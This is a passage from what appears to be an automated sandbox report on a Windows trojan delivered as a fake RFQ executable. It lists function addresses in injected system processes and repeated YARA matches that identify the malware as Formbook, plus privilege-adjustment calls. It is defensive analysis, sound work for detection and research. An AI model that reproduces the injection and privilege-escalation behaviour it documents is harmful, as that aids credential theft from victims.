          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD22_2_03003FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD52_2_03003FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1A0362_2_02F1A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1B2322_2_02F1B232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F110822_2_02F11082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F1E5CD2_2_02F1E5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F15B302_2_02F15B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F15B322_2_02F15B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F189122_2_02F18912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F12D022_2_02F12D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F5B323_2_0B1F5B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F5B303_2_0B1F5B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FB2323_2_0B1FB232
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F89123_2_0B1F8912
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F2D023_2_0B1F2D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FE5CD3_2_0B1FE5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1FA0363_2_0B1FA036
          Source: C:\Windows\explorer.exeCode function: 3_2_0B1F10823_2_0B1F1082
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1C2323_2_10D1C232
          Source: C:\Windows\explorer.exeCode function: 3_2_10D120823_2_10D12082
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1B0363_2_10D1B036
          Source: C:\Windows\explorer.exeCode function: 3_2_10D1F5CD3_2_10D1F5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10D199123_2_10D19912
          Source: C:\Windows\explorer.exeCode function: 3_2_10D13D023_2_10D13D02
          Source: C:\Windows\explorer.exeCode function: 3_2_10D16B303_2_10D16B30
Source: C:\Windows\explorer.exe | Code function: 3_2_10D16B32
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DFE4F6
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E02446
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DF4420
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E10591
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D50535
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D6C6E0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D4C7C0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D74750
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D50770
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DE2000
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E081CC
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E041A2
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E101AA
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DD8158
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DEA118
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D40100
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DD02C0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DF0274
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E103E6
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D5E3F0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0A352
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D40CF2
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DF0CB5
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D50C00
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D4ADE0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D68DBF
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DECD1F
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D5AD00
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0EEDB
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D62E90
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0CE93
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D50E59
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0EE26
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D42FC8
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D5CFE0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DCEFA0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DC4F40
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D70F30
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DF2F30
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D92F28
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D7E8F0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D368B8
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D52840
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D5A840
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E1A9A6
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D529A0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D66962
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D4EA80
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E06BD7
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0AB40
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D41460
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0F43F
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E195C3
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DED5B0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E07571
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E016CC
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D95630
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0F7B0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0F0E0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E070E9
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DFF0CC
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D570C0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D5B1B0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E1B16B
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D3F172
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D8516C
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D6B2C0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DF12ED
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D552A0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D9739A
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D3D34C
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0132D
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0FCF2
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DC9C32
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D6FDC0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E07D73
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D53D40
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E01D5A
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D59EB0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D13FD2
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D13FD5
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D51F92
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0FFB1
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0FF09
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D538E0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DBD800
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D59950
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D6B950
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DE5910
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DFDAC6
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DEDAAC
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D95AA0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DF1AA3
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E07A46
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0FA49
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DC3A6C
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D8DBF9
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04DC5BF0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04D6FB80
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04E0FB76
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E6E28D
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E6D770
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E6E57F
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E6DB1D
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E59E4B
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E59E50
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E52FB0
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E6DC79
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E6DDB7
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E52D88
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_02E52D90
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C0A036
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C0E5CD
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C02D02
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C01082
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C08912
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C0B232
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C05B30
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_04C05B32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 110 times
Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04DCF290 appears 105 times
Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04D85130 appears 58 times
Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04D97E54 appears 110 times
Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04D3B970 appears 280 times
Source: C:\Windows\SysWOW64\systray.exe | Code function: String function: 04DBEA12 appears 86 times
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: String function: 00108B40 appears 42 times
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: String function: 00100D27 appears 70 times
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: String function: 000E7F41 appears 35 times
Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427452536.00000000038E3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MKCC-MEC-RFQ-115-2024.exe
Source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1426625082.0000000003A5D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs MKCC-MEC-RFQ-115-2024.exe
Source: MKCC-MEC-RFQ-115-2024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: MKCC-MEC-RFQ-115-2024.exe PID: 7720, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7752, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: systray.exe PID: 7800, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/4@12/5
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0014A2D5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00138713 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00138CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
